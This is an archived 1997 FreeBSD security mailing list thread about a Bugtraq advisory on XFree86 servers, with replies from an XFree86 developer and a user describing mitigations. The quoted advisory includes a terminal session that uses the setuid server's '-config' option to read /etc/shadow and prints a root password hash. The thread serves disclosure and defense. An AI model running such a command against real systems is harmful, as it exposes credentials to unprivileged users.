From owner-freebsd-security Sun Nov 23 10:27:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA22791 for security-outgoing; Sun, 23 Nov 1997 10:27:01 -0800 (PST) (envelope-from owner-freebsd-security) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id KAA22786 for ; Sun, 23 Nov 1997 10:26:58 -0800 (PST) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.7/8.8.5) with SMTP id NAA02291; Sun, 23 Nov 1997 13:20:20 -0500 (EST) Date: Sun, 23 Nov 1997 13:20:20 -0500 (EST) From: spork X-Sender: spork@super-g.inch.com To: David Dawes cc: Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: "XFree86 insecurity" In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk A quick fix I already had in place from the old xterm exploits was to put all the people that use X (well, just me) in a group and make the X binaries with suid bits only executable by that group rather than world-execute. While it's not truly a fix, it does limit your vulnerability. I've yet to play with XDM... Charles Sprickman spork@super-g.com ---- "I'm not a prophet or a stone-age man Just a mortal with potential of a superman I'm living on" -DB On Sat, 22 Nov 1997, David Dawes wrote: > On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote: > > We (XFree86) are aware of this one. I agree with the recomendation of > removing the setuid bit and using xdm to start the Xserver, and if you > have XFree86 on a machine where this problem is significant, you should > consider doing this. > > The fix is to disable the '-config' Xserver option. This will be removed > in our next release, and also in the next X11 release from The Open > Group. It was only added to get around problems on OS's with small > command line length limits, and should never have been enabled for most > Unix-like OSs. The problem isn't XFree86-specific. It affects any > platform using X11R6 XC/TOG code where the Xserver is installed setuid > root (although on non-XFree86 platforms you may need to be a little more > inventive with the use of the -config option). > > David > > >Cute one. > > > >-----Forwarded message from shegget ----- > > > >Date: Fri, 21 Nov 1997 18:35:36 +0000 > >From: shegget > >Subject: XFree86 insecurity > >To: BUGTRAQ@NETSPACE.ORG > > > > plaguez security advisory n.10 > > > > XFree86 insecurity > > > > > > > > > >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...) > > > >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2. > > Other versions as well. > > > >OS: All > > > >Impact: The XFree86 servers let you specify an alternate configuration > > file and do not check whether you have rights to read it. > > Any user can read files with root permissions. > > > > > > > > > >hello, > >just a short one to tell you about this "feature" I found in all default > >XFree86 servers... > > > > > >Here it is: > > > >Script started on Sat Aug 23 15:32:36 1997 > >Loading /usr/lib/kbd/keytables/fr-latin1.map > >[plaguez@plaguez plaguez]$ uname -a > >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586 > >[plaguez@plaguez plaguez]$ ls -al /etc/shadow > >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow > >[plaguez@plaguez bin]$ id > >uid=502(plaguez) gid=500(users) groups=500(users) > >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin > >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow > >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1 > >use: X [:] [option] > >-a # mouse acceleration (pixels) > >-ac disable access control restrictions > >-audit int set audit trail level > >-auth file select authorization file > >bc enable bug compatibility > >-bs disable any backing store support > >-c turns off key-click > > > >... and so on. HINT: look at the first XF86_SVGA output line. > > > > > > > > > > > >Patch: > >------ > > > >If you run xdm, you should consider removing the setuid bit of the > >servers. > > > >If not, well, wait for the XFree86 Project to bring you a patch, since I'm > >too lazy to find and fix it. > > > > > > > > > > > >later, > > > >-plaguez > >dube0866@eurobretagne.fr > > > >-----End of forwarded message----- > > > >-- > > -- Phil > > > > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- >